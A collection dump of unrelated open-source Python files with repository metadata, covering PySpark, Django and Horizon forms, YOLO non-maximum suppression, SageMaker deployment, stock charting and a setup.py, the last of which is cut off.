43013396871 |
"""
Purpose:
Date created: 2020-04-19
Contributor(s):
Mark M.
"""
from __future__ import print_function
from pyspark import SparkContext
# from pyspark.sql import SparkSession
# spark = SparkSession.builder.appName("test1").getOrCreate()
sc = SparkContext(appName="matrices1")
rdd = sc.parallelize([1, 2,])
sorted(rdd.cartesian(rdd).collect())
n = 10
rng = sc.range(1, n + 1)
sum_ = rng.sum()
print(f"The sum of the numbers from 1 to 10 is: {sum_}")
sc.stop() | MarkMoretto/project-euler | spark/spark_basics_1.py | spark_basics_1.py | py | 473 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "pyspark.SparkContext",
"line_number": 17,
"usage_type": "call"
}
] |
7346608770 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import messages
from openstack_dashboard.api import cinder
# This set of states was pulled from cinder's snapshot_actions.py
STATUS_CHOICES = (
('available', _('Available')),
('creating', _('Creating')),
('deleting', _('Deleting')),
('error', _('Error')),
('error_deleting', _('Error Deleting')),
)
def populate_status_choices(initial, status_choices):
    """Build the status dropdown choices: every status except the snapshot's
    current one, preceded by a 'Select a new status' prompt entry."""
    current_status = initial.get('status')
    choices = [choice for choice in status_choices
               if choice[0] != current_status]
    return [("", _("Select a new status"))] + choices
class UpdateStatus(forms.SelfHandlingForm):
    """Admin form to force a volume snapshot into a new state via cinder."""
    status = forms.ChoiceField(label=_("Status"))

    def __init__(self, request, *args, **kwargs):
        super(UpdateStatus, self).__init__(request, *args, **kwargs)
        # Offer every status except the snapshot's current one.
        initial = kwargs.get('initial', {})
        self.fields['status'].choices = populate_status_choices(
            initial, STATUS_CHOICES)

    def handle(self, request, data):
        """Reset the snapshot state; flash success or redirect with an error."""
        try:
            cinder.volume_snapshot_reset_state(request,
                                               self.initial['snapshot_id'],
                                               data['status'])
            # Translate the machine status back to its display label.
            choices = dict(STATUS_CHOICES)
            choice = choices[data['status']]
            messages.success(request, _('Successfully updated volume snapshot'
                                        ' status: "%s".') % choice)
            return True
        except Exception:
            redirect = reverse("horizon:admin:volumes:index")
            exceptions.handle(request,
                              _('Unable to update volume snapshot status.'),
                              redirect=redirect)
| Mirantis/mos-horizon | openstack_dashboard/dashboards/admin/volumes/snapshots/forms.py | forms.py | py | 2,461 | python | en | code | 7 | github-code | 36 | [
{
"api_name": "django.utils.translation.ugettext_lazy",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "django.utils.translation.ugettext_lazy",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "django.utils.translation.ugettext_lazy",
"line_number": 27,
... |
39112390989 | import re
from django.http.response import HttpResponseServerError
from django.shortcuts import render, HttpResponse, redirect
from miapp.models import Article
from django.db.models import Q
from miapp.forms import FormArticle
from django.contrib import messages
# Create your views here.
# MVC = Model View Controller -> actions (methods)
# MVT = Model Template View  -> actions (methods)
# A small shared layout snippet for navigating between views (currently empty).
layout = """
"""
#Crear tu primera vista q son funciones
def index(request):
    """Home page: renders index.html with some demo template variables."""
    context = {
        'title': 'Home Page',
        'nombre': 'Rene Adonay',
        'lenguajes': ['Python', 'Js', 'PHP', "C++", "C"],
        'years': 2021,
        'rango': range(2021, 2051),
    }
    return render(request, 'index.html', context)
def hola_mundo(request): # `request` lets this view receive data from requests to its URL
    # Every view function must take the request parameter.
    # An inline HTML template could also be built here with a triple-quoted string.
    return render(request,'hola_mundo.html')
def test(request, redirigir=0):
    """Test page; `redirigir` is accepted from the URL but currently unused."""
    base_year = 2021
    return render(request, 'test.html', {
        'years': base_year,
        'rango': range(base_year, 2051),
    })
def contacto(request, nombre="", apellidos=""):
    """Contact page; optional URL name parts are accepted but unused."""
    return render(request, 'contacto.html')
def crear_articulo(request, title, content, public):
    """Create an Article from URL parameters and confirm with a plain response."""
    nuevo = Article(title=title, content=content, public=public)
    nuevo.save()
    return HttpResponse(f"Articulo creado: {nuevo.title} - {nuevo.content} ")
def save_article(request):
    """Persist an Article from POST form data; reject non-POST requests.

    BUGFIX: the original function ended with an unreachable `return` after
    the if/else (both branches already return) that also referenced a
    possibly-unbound local `articulo`; it has been removed.
    """
    if request.method == 'POST':
        title = request.POST['title']
        content = request.POST['content']
        public = request.POST['public']
        articulo = Article(
            title=title,
            content=content,
            public=public
        )
        articulo.save()
        return HttpResponse(f"Articulo creado: {articulo.title} - {articulo.content} ")
    else:
        return HttpResponse("<h2>No se ha podido Guardar nada</h2>")
def create_article(request):
    """Render the manual article-creation form page."""
    return render(request, 'create_article.html')
def create_full_article(request):
    """Validated article creation via FormArticle.

    On a valid POST: saves the article, flashes a success message and
    redirects to the article list. Otherwise renders the (empty) form.
    """
    if request.method == 'POST':
        formulario = FormArticle(request.POST)
        if formulario.is_valid():
            data_form = formulario.cleaned_data
            # BUGFIX: the original assignments ended with stray trailing
            # commas, which made `title` and `content` 1-element tuples and
            # stored tuple reprs in the database.
            title = data_form.get('title')
            content = data_form['content']
            public = data_form['public']
            articulo = Article(
                title=title,
                content=content,
                public=public
            )
            articulo.save()
            # Flash message (session-backed, shown exactly once).
            messages.success(request, f'Has creado correctamente el articulo {articulo.id} ')
            return redirect('Articulos')
            #return HttpResponse(str(articulo.title) + str(articulo.content) + str(articulo.public))
    else:
        formulario = FormArticle()
    return render(request, 'create_full_article.html', {
        'form': formulario
    })
def articulo(request):
    """Look up a single article by its (hard-coded) title and show id/title."""
    encontrado = Article.objects.get(title="Tercer_contenido")
    return HttpResponse(f"Articulo: {encontrado.id} - {encontrado.title}")
def editar_articulo(request, id):
    """Overwrite article *id* with fixed demo values and confirm.

    Raises Article.DoesNotExist when no article has primary key *id*.
    """
    articulo = Article.objects.get(pk=id)
    articulo.title = "Batman"
    articulo.content = "Pelicula de DC el caballero de la noche"
    articulo.public = True
    articulo.save()
    return HttpResponse(f"Articulo editado: {articulo.title} ")
def articulos(request):
    """List view: renders all published articles, newest first."""
    articulos = Article.objects.all()
    # NOTE(review): the queryset above is immediately overwritten — only the
    # filtered/ordered queryset below is used.
    articulos = Article.objects.filter(public=True).order_by('-id')
    """articulos = Article.objects.filter()
    articulos = Article.objects.filter(id__gte=10, title__contains="articulo")
    articulos = Article.objects.filter(
        title="articulo").exclude(public=True)
    articulos = Article.objects.raw("SELECT * FROM miapp_article WHERE title='articulo2' AND public=1 ")
    articulos = Article.objects.filter(
        Q(title__contains="") | Q(title__contains="")
    )
    )"""
    return render(request, 'articulos.html', {
        'articulos': articulos
    } )
def borrar_articulo(request, id):
    """Delete the article with primary key *id*, then redirect to the list."""
    articulo = Article.objects.get(pk=id)
    articulo.delete()
return redirect('Articulos') | reneafranco/web-aplications | AprendiendoDjango/miapp/views.py | views.py | py | 4,619 | python | es | code | 0 | github-code | 36 | [
{
"api_name": "django.shortcuts.render",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "django.shortcuts.render",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "django.shortcuts.render",
"line_number": 47,
"usage_type": "call"
},
{
"api_name"... |
70077269545 | import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from sklearn.impute import SimpleImputer
from sklearn.compose import ColumnTransformer
from sklearn.preprocessing import OneHotEncoder, LabelEncoder
from sklearn.model_selection import train_test_split
def createDataSet():
    """Read Data.csv and return (dataframe, feature matrix, target vector).

    Features are every column but the last; the last column is the target.
    """
    frame = pd.read_csv('Data.csv')
    features = frame.iloc[:, :-1].values
    target = frame.iloc[:, -1].values
    return frame, features, target
if __name__ == '__main__':
    data, x, y = createDataSet()
    # Replace missing numeric values (columns 1-2) with their column mean.
    imputer = SimpleImputer(missing_values=np.nan, strategy='mean')
    imputer.fit(x[:, 1: 3])
    print(x)
    print()
    x[:, 1:3] = imputer.transform(x[:, 1:3])
    # One-hot encode the first (categorical) column; pass the rest through.
    columnTrans = ColumnTransformer(transformers=[('encoder', OneHotEncoder(), [0])], remainder='passthrough')
    print(x)
    print()
    x = np.array(columnTrans.fit_transform(x))
    print(x)
    # Label-encode the target and hold out 20% of the rows for testing.
    le = LabelEncoder()
    y = le.fit_transform(y)
    xTrain , xTest, yTrain, yTest = train_test_split(x,y,test_size=0.2 )
| Chris-Haj/MachineLearning | MachineLearning/MLPrac.py | MLPrac.py | py | 967 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.read_csv",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "sklearn.impute.SimpleImputer",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "numpy.nan",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "sklearn.c... |
69842961063 |
from django.conf import settings
from . import models
from .clients.bezant import Client as BezantClient
def _issue_point_to_user(user, behaviour_code, amount=0, reason=None):
    """Look up the behaviour by code and award its points to *user*.

    Silently does nothing when the behaviour code is not configured.
    """
    try:
        behaviour = models.Behaviour.objects.get(code=behaviour_code)
    except models.Behaviour.DoesNotExist:
        return
    behaviour.issue_point_to_user(user, amount, reason)
def issue_signup_point(user):
    """Award signup points once per user; invited users also reward their inviter."""
    try:
        if user.invited_by:
            b = models.Behaviour.objects.get(code='signup_for_invitee')
        else:
            b = models.Behaviour.objects.get(code='signup')
    except models.Behaviour.DoesNotExist:
        return
    # Idempotence guard: never award the signup behaviour twice.
    qs = models.BehaviourPointLog.objects.filter(user=user, behaviour=b)
    if qs.exists():
        return
    if user.invited_by:
        _issue_point_to_user(
            user,
            'signup_for_invitee',
            reason='invited_by_recommended_code',
        )
        _issue_point_to_user(
            user.invited_by,
            'signup_for_inviter',
            reason='invite_user',
        )
    else:
        _issue_point_to_user(user, 'signup')
def issue_login_point(user):
    """Award the 'login' behaviour points to *user*."""
    _issue_point_to_user(user, 'login')
def issue_follow_point(user, target_user):
    """Reward *target_user* when *user* follows them (self-follows excluded)."""
    if user == target_user:
        return
    # Only award once the follow relation actually exists.
    if not user.following_set.filter(target=target_user).exists():
        return
    _issue_point_to_user(target_user, 'follow')
def issue_unfollow_point(user, target_user):
    """Adjust *target_user*'s points when *user* unfollows them."""
    if user == target_user:
        return
    # Only act once the follow relation no longer exists.
    if user.following_set.filter(target=target_user).exists():
        return
    _issue_point_to_user(target_user, 'unfollow')
def issue_like_point(user, target):
    """Reward both the liker and the author when *user* likes a published post."""
    # target is a Post instance
    if user == target.user:
        return
    if target.status != 'published':
        return
    # Only award once the like actually exists.
    if not target.like_set.filter(user=user).exists():
        return
    _issue_point_to_user(user, 'give-like')
    _issue_point_to_user(target.user, 'take-like')
def issue_unlike_point(user, target):
    """Adjust both users' points when *user* removes a like from a published post."""
    # target is a Post instance
    if user == target.user:
        return
    if target.status != 'published':
        return
    # Only act once the like has actually been removed.
    if target.like_set.filter(user=user).exists():
        return
    _issue_point_to_user(user, 'give-unlike')
    _issue_point_to_user(target.user, 'take-unlike')
def issue_comment_point(user, target):
    """Reward *user* for commenting on someone else's published post."""
    # target is a Post instance
    if user == target.user:
        return
    if target.status != 'published':
        return
    _issue_point_to_user(user, 'comment')
def issue_posting_point(target):
    """Reward the author for publishing the post *target*."""
    # target is a Post instance
    _issue_point_to_user(target.user, 'posting')
def issue_unposting_point(target):
    """Handle point adjustments when the post *target* is deleted.

    Issues the 'unposting' behaviour, then claws back the accumulated like
    points in one aggregated 'take-unlike' adjustment.
    """
    # target is a Post instance
    _issue_point_to_user(target.user, 'unposting')
    try:
        behaviour = models.Behaviour.objects.get(code='take-unlike')
    except models.Behaviour.DoesNotExist:
        return
    likes = target.like_set.count()
    if not likes:
        return
    # NOTE(review): amount scales with likes squared (likes * reward * likes)
    # — confirm this duplicated factor is intentional.
    amount = likes * behaviour.reward * likes
    _issue_point_to_user(
        target.user,
        'take-unlike',
        amount,
        models.BehaviourPointLog.reasons.SUM_UNLIKE_POINT_BY_DELETED_POSTING,
    )
def create_bezant_wallet(password: str) -> str:
    """Create a new Bezant blockchain wallet and return its enrollment ID.

    Uses the endpoint/apikey configured in Django settings.
    """
    client = BezantClient(
        endpoint=settings.BEZANT_ENDPOINT,
        apikey=settings.BEZANT_APIKEY,
    )
    result = client.create_wallet(password)
    return result['message']['enrollmentID']
| friendlywhales/lineup-web | backend/currencies/tasks.py | tasks.py | py | 3,415 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "clients.bezant.Client",
"line_number": 126,
"usage_type": "call"
},
{
"api_name": "django.conf.settings.BEZANT_ENDPOINT",
"line_number": 127,
"usage_type": "attribute"
},
{
"api_name": "django.conf.settings",
"line_number": 127,
"usage_type": "name"
},
... |
22811835651 | from apscheduler.schedulers.background import BlockingScheduler
from model import Model
from tools.zlogging import loggers, post_trade_doc
from datetime import datetime
from threading import Thread
import time
class Instrument(Thread):
    # How many times per second microsecond_job invokes its callback.
    n_times_per_second = 10
    # How many full time_period intervals a closed trade stays in the backlog
    # before its document is posted.
    N_BACKLOG_PERIODS = 3
    def __init__(self, ticker, time_period, short_num_periods, num_periods, manager):
        """One worker thread per instrument: scans for signals and manages trades."""
        Thread.__init__(self)
        ## Book keeping
        self.ticker = ticker
        self.time_period = time_period
        self.short_num_periods = short_num_periods
        self.n_micros = int(1e6 / self.n_times_per_second)
        self.model = Model(ticker = ticker, short_num_periods = short_num_periods, num_periods = num_periods)
        self.manager = manager
        self.logger = loggers[ticker]
        self.state = "ACTIVE"
        # NOTE(review): self.storage is read by scanner_job but never assigned
        # here — presumably attached externally before the jobs run; confirm.
    def scanner_job(self):
        """Scan for a trade signal when idle; otherwise feed the open trade and backlog."""
        if self.ticker not in self.manager.trades and self.state == 'ACTIVE':
            signal, features, direction, open_, close = self.model.is_trade(list(self.storage.data).copy())
            # Candle size measured in fifths of a tick increment.
            cs = abs(close - open_) / (self.manager.tick_increments[self.ticker] / 5)
            if signal and cs >= 10:
                data = {
                    "historical" : list(self.storage.data),
                    "features" : features
                }
                self.manager.on_signal(direction = direction, quantity = 100000, symbol = self.ticker, prices = (open_, close), data = data.copy())
                self.logger.info('JOB: Starting Manager')
                self.blocker.resume_job('manager_job')
        elif self.ticker in self.manager.trades:
            # Append the latest observation to the active trade's post-entry data.
            self.manager.trades[self.ticker].post_data.append(self.storage.data[-1])
        if self.ticker in self.manager.backlog:
            idc = []
            for i, trade in enumerate(self.manager.backlog[self.ticker]):
                dt = datetime.now()
                trade, close_time = trade
                trade.post_data.append(self.storage.data[-1])
                # Post the trade document once N_BACKLOG_PERIODS full periods elapsed.
                if int((dt - close_time).seconds / (60 * self.time_period)) == self.N_BACKLOG_PERIODS:
                    print('POSTING BACKLOG')
                    post_trade_doc(trade)
                    idc.append(i)
            # NOTE(review): deleting by ascending index shifts later elements;
            # with multiple matured trades this removes the wrong entries —
            # consider iterating idc in reverse.
            for idx in idc:
                del self.manager.backlog[self.ticker][idx]
    def manager_job(self):
        """Tick the active trade once per second; pause itself when no trade is open."""
        if self.ticker in self.manager.trades:
            self.manager.trades[self.ticker].on_period()
        else:
            self.logger.info('JOB: Stopping Manager')
            self.blocker.pause_job('manager_job')
    def microsecond_job(self, job_func, params):
        """Invoke job_func(*params) repeatedly within the current second, then sleep one slot."""
        micros = datetime.now().microsecond
        while int(micros / self.n_micros) < self.n_times_per_second - 1:
            job_func(*params)
            micros = datetime.now().microsecond
        time.sleep(1.0 / self.n_times_per_second)
    def run(self):
        """Thread entry point: start the blocking scheduler with the (paused) manager job."""
        ## Scheduler to run
        job_defaults = {
            'coalesce': True,
            'max_instances': 1
        }
        self.blocker = BlockingScheduler(job_defaults = job_defaults)
        self.blocker.add_job(self.manager_job, 'cron', second='*', id='manager_job', next_run_time=None)
        self.blocker.start()
    def on_close(self):
        """Shut down the scheduler, then join the thread (next line)."""
        self.blocker.shutdown()
self.join() | zQuantz/Logma | ibapi/instrument.py | instrument.py | py | 3,436 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "threading.Thread",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "threading.Thread.__init__",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "threading.Thread",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "model.Mod... |
14310771223 | """
Nazwa: nms.py
Opis: Końcowe przetwarzanie wyjść z modelu. Filtracja po pewności,
transformacja koordynatów ramek, NMS.
Autor: Bartłomiej Moroz
"""
import torch
import torchvision
def transform_bbox(bboxes: torch.Tensor) -> torch.Tensor:
    """
    Transform bounding boxes from center format (x, y, w, h) into corner
    format (x1, y1, x2, y2). The input tensor is not modified.
    """
    # new_empty replaces the deprecated Tensor.new(...) constructor; it keeps
    # the input's dtype/device and leaves values uninitialized until written.
    new_bboxes = bboxes.new_empty(bboxes.shape)
    half_sizes = bboxes[..., 2:4] / 2
    new_bboxes[..., 0:2] = bboxes[..., 0:2] - half_sizes
    new_bboxes[..., 2:4] = bboxes[..., 0:2] + half_sizes
    return new_bboxes
def apply_confidence_threshold(
    predictions: torch.Tensor, objectness_confidence: float
) -> torch.Tensor:
    """
    Keep only the predictions whose objectness score (column 4) is strictly
    above the given confidence threshold.
    """
    keep = predictions[..., 4] > objectness_confidence
    return predictions[keep, :]
def find_best_class(predictions: torch.Tensor) -> torch.Tensor:
    """
    Collapse per-class confidences into a single best class per prediction.

    The objectness column is scaled in place by the winning class confidence,
    and the class-probability columns are replaced by the winning class index:
    (x1, y1, x2, y2, objectness, classes...) -> (x1, y1, x2, y2, final_confidence, class)
    """
    best_scores, best_classes = torch.max(predictions[..., 5:], dim=1)
    # final confidence = objectness * best class confidence (in-place on col 4)
    predictions[..., 4] *= best_scores
    return torch.cat([predictions[..., :5], best_classes.unsqueeze(1)], dim=1)
def non_maximum_suppression(x: torch.Tensor, iou: float) -> torch.Tensor:
    """
    Run Non Maximum Suppression over all predictions of one image,
    independently for each predicted class.
    """
    kept = x.new_empty(0, x.size(1))
    for cls in torch.unique(x[..., 5]):
        # Gather this class's predictions, ordered by descending confidence.
        candidates = x[x[..., 5] == cls]
        _, order = torch.sort(candidates[..., 4], descending=True)
        candidates = candidates[order]
        # NMS proper (torchvision returns indices of surviving boxes).
        survivors = torchvision.ops.nms(
            candidates[..., :4], candidates[..., 4], iou
        )
        kept = torch.cat([kept, candidates[survivors]], dim=0)
    return kept
def reduce_boxes(
    predictions: torch.Tensor, confidence_threshold=0.3, iou=0.5, min_max_size=(2, 416)
) -> torch.Tensor:
    """
    Given a batch of predictions, perform some transformations and reduce them to only the meaningful ones:
    - filter out low objectness
    - filter out too small or too big boxes
    - transform (x, y, w, h) boxes into (x1, y1, x2, y2)
    - find best class for each prediction
    - filter out low objectness * class_confidence
    - perform NMS
    - prepend each prediction with image index in batch
    Additionally, the batch is flattened from (batch_size, all_predictions, model_output_predictions) into (-1, final_prediction_shape).
    Final prediction shape: (id_in_batch, x1, y1, x2, y2, final_confidence, class)

    ``min_max_size`` is the (exclusive) valid range for box width and height
    in pixels; ``confidence_threshold`` is applied twice (raw objectness and
    objectness * class confidence). Note that ``find_best_class`` mutates
    ``x`` in place, which is safe here because ``x`` is always reassigned.
    """
    # 7 columns: (batch_idx, x1, y1, x2, y2, confidence, class).
    all_results = predictions.new_empty(0, 7)
    # Process every image separately, NMS can't be vectorized
    for i, x in enumerate(predictions):
        # Filter out low objectness results
        x = apply_confidence_threshold(x, confidence_threshold)
        # Filter out invalid box width/height
        x = x[
            ((x[..., 2:4] > min_max_size[0]) & (x[..., 2:4] < min_max_size[1])).all(1)
        ]
        if x.size(0) == 0:
            continue
        # Transform bbox from (x, y, w, h, ...) into (x1, y1, x2, y2, ...)
        x[..., :4] = transform_bbox(x[..., :4])
        # Choose and save the most probable class
        x = find_best_class(x)
        # Filter out low final confidence results
        x = apply_confidence_threshold(x, confidence_threshold)
        if x.size(0) == 0:
            continue
        # NMS
        result_preds = non_maximum_suppression(x, iou)
        # Add index in batch to all image predictions
        indices_in_batch = result_preds.new(result_preds.size(0), 1).fill_(i)
        result_preds_with_indices = torch.cat([indices_in_batch, result_preds], dim=1)
        # Save results
        all_results = torch.cat([all_results, result_preds_with_indices], dim=0)
    return all_results
| The0Jan/GSN_YOLO | src/processing/nms.py | nms.py | py | 4,524 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "torch.Tensor",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "torch.Tensor",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "torch.Tensor",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_name": "torch.Tensor",
... |
27100233719 | import os
import json
import argparse
from pathlib import Path
import boto3
import sagemaker
from sagemaker.sklearn.estimator import SKLearn
# Read build/deploy configuration from the CloudFormation stack outputs.
## Stack is named "<service>-<env>", e.g. "sagemaker-serverless-example-dev".
SERVICE_NAME = "sagemaker-serverless-example"
ENV = os.environ.get("ENV", "dev")
STACK_NAME = f"{SERVICE_NAME}-{ENV}"
## Read the stack Outputs as a {OutputKey: OutputValue} dict.
stack = boto3.resource('cloudformation').Stack(STACK_NAME)
outputs = {o["OutputKey"]: o["OutputValue"] for o in stack.outputs}
S3_BUCKET = outputs["S3Bucket"]
S3_TRAIN_BASE_KEY = outputs["S3TrainBaseKey"]
S3_MODEL_BASE_KEY = outputs["S3ModelBaseKey"]
SM_ROLE_ARN = outputs["SmRoleArn"]
SM_ENDPOINT_NAME = outputs["SmEndpointName"]
# S3 URIs for the training data (input) and the trained model artifact (output).
INPUT_PATH = f"s3://{S3_BUCKET}/{S3_TRAIN_BASE_KEY}"
OUTPUT_PATH = f's3://{S3_BUCKET}/{S3_MODEL_BASE_KEY}'
def main(update_endpoint=False):
    """Train the scikit-learn iris model on SageMaker and deploy an endpoint.

    When ``update_endpoint`` is True, the existing endpoint named
    SM_ENDPOINT_NAME is updated instead of created.
    NOTE(review): ``train_instance_type`` and ``update_endpoint`` are
    SageMaker Python SDK v1 parameters — confirm the pinned SDK version
    before upgrading (v2 renamed/removed them).
    """
    # Training script executed inside the SageMaker SKLearn container.
    script_path = str(Path(__file__).parent/"src/iris.py")
    train_instance_type = "ml.m5.large"
    initial_instance_count = 1
    hosting_instance_type = "ml.t2.medium"
    sagemaker_session = sagemaker.Session()
    # Train
    sklearn = SKLearn(
        entry_point=script_path,
        train_instance_type=train_instance_type,
        role=SM_ROLE_ARN,
        sagemaker_session=sagemaker_session,
        output_path=OUTPUT_PATH
    )
    sklearn.fit({'train': INPUT_PATH})
    # Deploy
    sklearn.deploy(
        initial_instance_count=initial_instance_count,
        instance_type=hosting_instance_type,
        endpoint_name=SM_ENDPOINT_NAME,
        update_endpoint=update_endpoint
    )
if __name__ == "__main__":
    # CLI: pass --update-endpoint to update an already-deployed endpoint.
    parser = argparse.ArgumentParser()
    parser.add_argument('--update-endpoint', action='store_true')
    args = parser.parse_args()
    update_endpoint = args.update_endpoint
    main(update_endpoint)
{
"api_name": "os.environ.get",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "boto3.resource",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "pathlib.Path",
"lin... |
10828794870 | # 효율성 실패
from collections import deque
def bfs(node, visit, dist, n):
    """0-1 BFS over the implicit graph where x -> 2x costs 0 and x -> x+1 costs 1.

    Returns dist[n], the minimum number of +1 steps needed to reach ``n``
    from ``node``. ``visit`` and ``dist`` are caller-provided lists of
    length n+1, with ``dist`` pre-filled with -1.
    """
    queue = deque([node])
    visit[node] = 1
    dist[node] = 0
    while queue:
        cur = queue.popleft()
        if cur == n:
            return dist[n]
        if cur < n + 1:
            doubled = cur * 2
            if doubled < n + 1 and dist[doubled] == -1 and visit[doubled] == 0:
                # Doubling is free, so it goes to the front of the deque.
                dist[doubled] = dist[cur]
                visit[doubled] = 1
                queue.appendleft(doubled)
            incremented = cur + 1
            if incremented < n + 1 and dist[incremented] == -1 and visit[incremented] == 0:
                # +1 costs one operation and goes to the back.
                dist[incremented] = dist[cur] + 1
                visit[incremented] = 1
                queue.append(incremented)
def solution(n):
    """Return the minimum number of +1 operations to build ``n`` from 0
    when doubling is free.

    Reading ``n`` backwards (halve when even — free, subtract 1 when odd —
    one operation) shows the answer is exactly the number of set bits of
    ``n``, so the O(n) BFS is replaced by an O(log n) popcount. This fixes
    the efficiency failure noted at the top of the file while returning the
    same answers as the original BFS.
    """
    return bin(n).count("1")
| choijaehoon1/programmers_level | src/test122_01.py | test122_01.py | py | 843 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "collections.deque",
"line_number": 5,
"usage_type": "call"
}
] |
21076570449 | #!/usr/bin/env python
# coding=utf-8
import matplotlib.pyplot as plt
import matplotlib.mlab as mlab
from datetime import datetime,date
import time
import tushare as ts
from matplotlib.dates import DateFormatter, WeekdayLocator, DayLocator, MONDAY, YEARLY, date2num
from matplotlib.finance import quotes_historical_yahoo_ohlc, candlestick_ohlc,candlestick2_ochl
import numpy as np
from util.util import moving_average
def not_empty(s):
    """Return ``s.strip()`` when *s* is truthy, otherwise *s* unchanged.

    Usable as a filter predicate: None, "" and whitespace-only strings
    all map to a falsy result.
    """
    return s.strip() if s else s
def accu_price(price_change):
    """Compound a list of percentage changes into cumulative growth factors.

    The first entry is always the baseline 1; entry i (i >= 1) is the
    running product of (1 + price_change[k] / 100) for k = 1..i.  Note
    that price_change[0] is deliberately skipped as the baseline day.
    """
    factors = [1]
    running = 1
    for pct in price_change[1:]:
        running *= 1 + pct / 100
        factors.append(running)
    return factors
def diff_price(price):
    """Convert a price series into day-over-day percentage changes.

    The first entry is 0 (no previous day); entry i is the percent change
    from price[i-1] to price[i].
    """
    changes = [0]
    for prev, cur in zip(price, price[1:]):
        changes.append((cur - prev) / prev * 100)
    return changes
def cut_date(quotes, date1, date2):
    """Return the quotes whose first field (the numeric date) lies strictly
    between ``date1`` and ``date2`` (both bounds exclusive)."""
    return [q for q in quotes if date1 < q[0] < date2]
def main(stock):
    """Fetch daily history for *stock* via tushare and plot a candlestick chart
    with a 30-day moving average overlaid, restricted to 2017-09 .. 2018-06.

    NOTE(review): ``hist_data.sort(columns ='')`` — DataFrame.sort was removed
    from pandas long ago and an empty column name looks wrong; this probably
    intended ``sort_index()``. Also, ``matplotlib.finance`` (imported at the
    top of the file) was removed from matplotlib — confirm pinned versions.
    """
    hist_data = ts.get_hist_data(stock)
    quotes = []
    print(hist_data.head())
    hist_data.sort(columns ='')
    for dates, row in hist_data.iterrows():
        # Convert the date string into matplotlib's numeric date format.
        date_time = datetime.strptime(dates, '%Y-%m-%d')
        t = date2num(date_time)
        # open, high, low, close,volume = row[:5]
        # datas = (t, open, high, low, close,volume)
        quotes.append((t, row['open'], row['high'], row['low'], row['close'], row['volume'],row['p_change'])) # Date,Open,High,Low,Close,Volume
        # quotes.append(datas)
    date1 = date2num(date(2017, 9, 1)) # start date as a (year, month, day) tuple
    date2 = date2num(date(2018, 6, 1)) # end date as a (year, month, day) tuple
    quotes = cut_date(quotes, date1, date2)#Date,Open,High,Low,Close,Volume,Adj Close
    dates = [q[0] for q in quotes]
    opens = [q[1] for q in quotes]
    highs=[q[2] for q in quotes]
    lows=[q[3] for q in quotes]
    closes=[q[4] for q in quotes]
    price_change=[q[6] for q in quotes]
    # price_change=diff_price(closes)
    # accu=accu_price(price_change)
    # print(price_change)
    # print(accu)
    # print(closes)
    # NOTE(review): ma20 and ma5 below are computed but never plotted.
    ma20 = moving_average(closes, 20)
    fig, ax = plt.subplots()
    fig.subplots_adjust(bottom=0.2)
    # ax.xaxis_date()
    ma5 = moving_average(closes, 5)
    ma30 = moving_average(closes, 30)
    # ax.plot_date(dates, accu, 'r-')
    ax.plot_date(dates, ma30, '-')
    candlestick_ohlc(ax, quotes, width=0.6, colorup='r', colordown='g')
    ax.grid(True)
    plt.title(stock)
    plt.show()
    return
if __name__ == '__main__':
    main("600519")  # demo ticker: Kweichow Moutai (Shanghai exchange)
| jcjview/stock | src/tushare_candle.py | tushare_candle.py | py | 2,646 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "tushare.get_hist_data",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.strptime",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 48,
"usage_type": "name"
},
{
"api_name": "ma... |
import re
from setuptools import setup, find_packages
from marcus import __version__

# Parse "requirements.txt" into setuptools inputs.  Lines carrying an
# "#egg=<name>-<version>" marker are VCS links: the bare package name goes
# to install_requires and the full URL to dependency_links; ordinary lines
# go straight into install_requires.
install_requires = []
dependency_links = []
with open('requirements.txt') as requirements:
    for line in requirements:
        line = line.strip()
        if line and not line.startswith('#'):  # for inline comments
            if "#egg" in line:
                names = re.findall('#egg=([^-]+)-', line)
                install_requires.append(names[0])
                dependency_links.append(line)
            else:
                install_requires.append(line)

# Use README.rst as the long description when present; a missing file is
# tolerated (e.g. building from a stripped-down sdist).
long_description = ""
try:
    with open("README.rst") as readme:
        long_description = readme.read()
except OSError:  # narrowed from a bare `except:`, which also hid real bugs
    pass

setup(
    name='django-marcus',
    version=__version__,
    description="Bilingual blog on Django",
    long_description=long_description,
    keywords='django, blog',
    author='Mikhail Andreev',
    author_email='x11org@gmail.com',
    url='http://github.com/adw0rd/marcus',
    license='BSD',
    packages=find_packages(),
    zip_safe=False,
    install_requires=install_requires,
    dependency_links=dependency_links,
    package_data={'': ['requirements.txt']},
    include_package_data=True,
    classifiers=[
        "Environment :: Web Environment",
        "Programming Language :: Python",
        "Framework :: Django",
        "License :: OSI Approved :: BSD License",
